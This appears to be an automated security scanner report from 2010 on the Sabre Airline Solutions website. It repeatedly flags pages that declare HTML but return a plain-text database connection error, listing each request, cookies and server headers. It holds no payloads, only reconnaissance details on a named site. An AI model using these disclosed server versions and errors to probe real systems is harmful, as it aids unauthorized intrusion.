GET /home/about/executive_team/stephen_m._clampett HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/executive_team/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321284; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A19%3A%22%2Fnews_events%2Fevent%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A7%3A%22%2Fabout%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 00:43:25 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/about/executive_team/tom_klein HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/executive_team/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321283; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A21%3A%22%2Fsearch%2Fshow_results%2F%22%3Bi%3A2%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Foperations_user_conference2%2F%22%3Bi%3A3%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 00:43:25 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/about/media_press/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286320657; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 01:28:41 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/about/privacy_policy/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286320657; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 00:43:25 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/about/sitemap/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286320657; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 00:43:25 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/about/the_as_advantage/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286320657; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 00:43:25 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 00:43:25 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/contact HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286320657; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 00:43:25 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 00:43:25 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/airline_distribution HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322158; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A63%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_flight_plan_manager%2F%22%3Bi%3A1%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_manager%2F%22%3Bi%3A2%3Bs%3A55%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_staff_admin%2F%22%3Bi%3A3%3Bs%3A53%3A%22%2Fproducts_services%2Fproduct%2Fsabre_qik_analysis_system%2F%22%3Bi%3A4%3Bs%3A62%3A%22%2Fproducts_services%2Fproduct%2Finterline_electronic_ticketing_hub%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 02:52:04 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/airline_reservations HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/customer_sales_service Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286302664.1286304597.3; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323238; __utmb=178985382.2.10.1286304597; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:27:37 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/airline_reservations/downloads HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/downloads/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286302664.1286304597.3; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323079; __utmb=178985382.1.10.1286304597; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:57:27 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/airline_reservations/downloads/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323007; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A51%3A%22%2Fproducts_services%2Fcommercial_planning%2Fbuild_brand%2F%22%3Bi%3A1%3Bs%3A39%3A%22%2Fproducts_services%2Fproduct%2Ftravel_bank%2F%22%3Bi%3A2%3Bs%3A52%3A%22%2Fproducts_services%2Fproduct%2Fgds_electronic_ticketing%2F%22%3Bi%3A3%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_schedule_manager%2F%22%3Bi%3A4%3Bs%3A57%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_fares_manager%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:57:27 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/airline_reservations/downloads/images HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/downloads/images/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286302664.1286304597.3; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323079; __utmb=178985382.1.10.1286304597; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:57:27 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/airline_reservations/downloads/images/pdf_icon.gif HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/downloads/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286302664.1286304597.3; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323238; __utmb=178985382.2.10.1286304597; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:57:27 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/airline_reservations/ecommerce HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/ecommerce/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323028; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A45%3A%22%2Fproducts_services%2Fairline_reservations%2Fnews%2F%22%3Bi%3A1%3Bs%3A52%3A%22%2Fproducts_services%2Fcommercial_planning%2Fbuild_profit%2F%22%3Bi%3A2%3Bs%3A43%3A%22%2Fproducts_services%2Fproduct%2Fsabresonic_sell%2F%22%3Bi%3A3%3Bs%3A54%3A%22%2Fproducts_services%2Fproduct%2Fsabre_gds_display_analysis%2F%22%3Bi%3A4%3Bs%3A59%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_network_manager%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:57:27 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/airline_reservations/images HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/images/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286302664.1286304597.3; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323204; __utmb=178985382.1.10.1286304597; exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A47%3A%22%2Fproducts_services%2Fairline_reservations%2Fimages%2F%22%3Bi%3A1%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A2%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 04:01:29 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/airline_reservations/images/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286302664.1286304597.3; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323079; __utmb=178985382.1.10.1286304597; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:59:15 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/airline_reservations/images/pdf_icon.gif HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/downloads Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286302664.1286304597.3; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323238; __utmb=178985382.2.10.1286304597; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:59:59 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/airline_reservations/more_customers HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/more_customers/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286302664.1286304597.3; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323144; __utmb=178985382.1.10.1286304597; exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A22%3A%22%2Fincludes%2Fform_suites%2F%22%3Bi%3A1%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A2%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:57:27 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/airline_reservations/more_customers/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323016; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A60%3A%22%2Fproducts_services%2Fcommercial_planning%2Fairvision_technology%2F%22%3Bi%3A1%3Bs%3A40%3A%22%2Fproducts_services%2Fproduct%2Fweb_services%2F%22%3Bi%3A2%3Bs%3A46%3A%22%2Fproducts_services%2Fproduct%2Finteract_interface%2F%22%3Bi%3A3%3Bs%3A61%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_slot_manager_iata%2F%22%3Bi%3A4%3Bs%3A61%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_codeshare_manager%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:57:27 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/airline_reservations/more_revenue HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/more_revenue/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286302664.1286304597.3; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323140; __utmb=178985382.1.10.1286304597; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A47%3A%22%2Fproducts_services%2Fcommercial_planning%2Fmy_list%2F%22%3Bi%3A1%3Bs%3A52%3A%22%2Fproducts_services%2Fcommercial_planning%2Fbuild_profit%2F%22%3Bi%3A2%3Bs%3A51%3A%22%2Fproducts_services%2Fenterprise_operations%2Fdownloads%2F%22%3Bi%3A3%3Bs%3A62%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_technology%2F%22%3Bi%3A4%3Bs%3A63%3A%22%2Fproducts_services%2Fcommercial_planning%2Fsabre_airvision_revenue%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:57:27 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /home/products_services/airline_reservations/more_revenue/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/airline_reservations/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286302664.1286304597.3; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286323238; __utmb=178985382.2.10.1286304597; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A8%3A%22%2Fascend%2F%22%3Bi%3A1%3Bs%3A36%3A%22%2F3%2Fefdc23b5379445c2a0d7c47043337670%2F%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 03:57:27 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provide ...[SNIP]...
The response contains the following Content-type statement:
Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain plain text.
Request
